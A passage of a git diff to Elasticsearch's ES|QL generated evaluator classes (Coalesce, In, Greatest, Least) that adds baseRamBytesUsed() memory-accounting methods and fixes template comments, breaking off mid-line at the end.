a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java index a6c36ea2aac4a..ce910ed766bdc 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; // begin generated imports +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.Page; @@ -25,12 +26,14 @@ /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class CoalesceDoubleEvaluator implements EvalOperator.ExpressionEvaluator permits CoalesceDoubleEvaluator.CoalesceDoubleEagerEvaluator, // CoalesceDoubleEvaluator.CoalesceDoubleLazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceDoubleEvaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -130,6 +133,15 @@ public final String toString() { return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java index b4be642f34f84..db5b1dde2b431 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; // begin generated imports +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.Page; @@ -25,12 +26,14 @@ /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class CoalesceIntEvaluator implements EvalOperator.ExpressionEvaluator permits CoalesceIntEvaluator.CoalesceIntEagerEvaluator, // CoalesceIntEvaluator.CoalesceIntLazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceIntEvaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -130,6 +133,15 @@ public final String toString() { return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java index 98a782abd1ed1..0b5f2b7d73b85 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.esql.expression.function.scalar.nulls; // begin generated imports +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; @@ -25,12 +26,14 @@ /** * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}. - * This class is generated. Edit {@code X-InEvaluator.java.st} instead. + * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead. */ abstract sealed class CoalesceLongEvaluator implements EvalOperator.ExpressionEvaluator permits CoalesceLongEvaluator.CoalesceLongEagerEvaluator, // CoalesceLongEvaluator.CoalesceLongLazyEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceLongEvaluator.class); + static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List children) { List childEvaluators = children.stream().map(toEvaluator::apply).toList(); if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) { @@ -130,6 +133,15 @@ public final String toString() { return getClass().getSimpleName() + "[values=" + evaluators + ']'; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (ExpressionEvaluator e : evaluators) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public final void close() { Releasables.closeExpectNoException(() -> Releasables.close(evaluators)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java index 5db804c9a4852..c299987726c91 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -169,6 +172,16 @@ public String toString() { return "InBooleanEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java index 7113f004c17c9..ce5355796d6a7 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -159,6 +162,16 @@ public String toString() { return "InBytesRefEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java index 99ffa891b9c7c..d4bac139fd83b 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InDoubleEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java index d6c160c0e45d3..758c08be51788 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.IntBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InIntEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java index 9f9b05b4c9c54..84709bea1c97f 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InLongEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java index d95aa2f52550e..2256f63c81e1a 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InMillisNanosEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java index 6461acde51187..97d358afb1a14 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InNanosMillisEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java index 581ae82afbd21..e1ae5df99a83c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBooleanEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock[] valuesBlocks) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { boolean[] valuesValues = new boolean[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java index 9926644551faf..acd37db346bd4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestBytesRefEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Arrays; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -58,6 +61,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java index a0129f7762379..8ebfc34a1664b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock[] valuesBlocks) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { double[] valuesValues = new double[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java index 7b2d3e76a027b..11cd8c48f29d7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock[] valuesBlocks) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { int[] valuesValues = new int[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java index 94c6bbd934751..104c76ca1c1aa 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/GreatestLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class GreatestLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreatestLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock[] valuesBlocks) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { long[] valuesValues = new long[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java index 8bf830d030f63..62f8e9fbbb411 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBooleanEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import java.util.Arrays; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -57,6 +60,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock[] valuesBlocks) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { boolean[] valuesValues = new boolean[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java index fe06aa9b5f32e..b70affe09ad30 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/LeastBytesRefEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Arrays; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class LeastBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LeastBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator[] values; @@ -58,6 +61,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git 